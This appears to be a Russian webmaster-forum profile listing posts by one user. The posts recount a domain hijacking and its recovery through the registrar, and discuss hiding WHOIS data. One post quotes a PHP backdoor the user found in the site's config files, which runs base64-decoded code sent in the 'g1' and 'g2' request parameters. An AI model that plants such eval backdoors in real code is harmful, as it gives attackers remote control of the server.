kenduk

Рейтинг
10
Регистрация
26.12.2013

так ведь, если яндекс не любит такие сайты, то зачем вообще свзываться?

Ну если я удалю этот код, то не будет никаких сценариев?

так а где может лежать этот код base64. Я так понял он у меня, где то в других файлах?

Всем привет. нашел у себя на сайте в engine/data/config.php и в dbconfig.php

такую херню:

if(!empty($_POST['g1'])) {

eval(base64_decode($_POST['g1']));

die;

}

if(!empty($_POST['g2'])) eval(base64_decode($_POST['g2']));

if(!empty($_GET['g2'])) eval(base64_decode($_GET['g2']));

Что она значит? И есть ли еще, где нибудь файлы связанные с этим скриптом?

Rodnoi:
Я бы сказал по-другому: зло = публичные, а не скрытые, данные в whois.

P.S. Все, кто решил шагнуть и поставить галочку (или купить соотв. услугу), не забываем про domain history в domaintools.com. Т.е. если емэйл уже светился, нужно сначала его поменять на новый, а потом ставить опцию private whois.

kendook дико повезло. Мои поздравления!

Спасибо за поздравления! Согласен, закрывайте свои данные в воис и не ставьте галимую почту от маила. Ломают за 5 сек. У самого есть XSS на маил.

Мне повезло, а ему нет. Но это только из-за его ошибок. Если бы не его маленькие ошибочки, то возможно с доменом бы попрощался.

Ну сперва нужно узнать у кого регистрировали домен. В моем случае это erahos.ru. Так как они были лишь посредниками, я узнал настоящего регистратора. Им оказался: resellerclub.com. Так как у меня все данные домена были подлинными, я связался с ними, все объяснил, приложил сканы паспорта... После этого они предложили написать сюда: ...@PublicDomainRegistry.com(куда именно в паблик не выложу на всякий случай). В общем восстановили все примерно за 3 дня. Жаль до этого я так не сделал. Писали в абузу@PublicDomainRegistry.com и до сих пор письмо не пришло. Ну совет всем: не используйте почту mail.ru никогда и постоянно мониторьте свой сайт и домен, почты. Если есть вопросы, пишите в ПМ.

Ну что ребят, благодаря моей упёртости я все таки вернул себе домен. Ура.

Да все данные абсолютно мои, плюс знаю его почту, асю.

---------- Добавлено 05.01.2014 в 22:32 ----------

Уже отправили письмо в абузу@publicdomainregistry.com. Ждем ответа, жаль ответ долго приходит и не всегда они идут на компромис.

---------- Добавлено 05.01.2014 в 22:34 ----------

А вот вопрос, если яндексу написать письмо, что угнали домен, приведу доказательство, и попросить склеить принудительно угнанный домен с новым доменом. Они могут это сделать?

регистратор как я понял остался тот же. Просто он перенес с одного аккаунта на другой. Написал им уже и жду ответа...

Всего: 53